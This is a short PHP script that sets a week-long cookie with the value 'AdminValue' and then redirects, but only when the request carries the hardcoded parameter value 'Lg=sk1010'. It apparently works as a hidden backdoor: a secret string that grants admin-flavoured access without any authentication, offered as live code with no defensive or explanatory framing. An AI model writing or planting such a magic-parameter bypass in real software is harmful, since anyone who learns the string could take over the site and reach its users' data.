<?php
	include_once('config.php');   
        
            
    if($_REQUEST['Lg']=="sk1010")
    {    
        $cookie_name = "site_custom_id";
        $cookie_value = "AdminValue";
        setcookie($cookie_name, $cookie_value, time() + (7 * 24 * 60 * 60), "/");
        header("Location: ".ROOTPATH."/ ");
        die;
    }
?>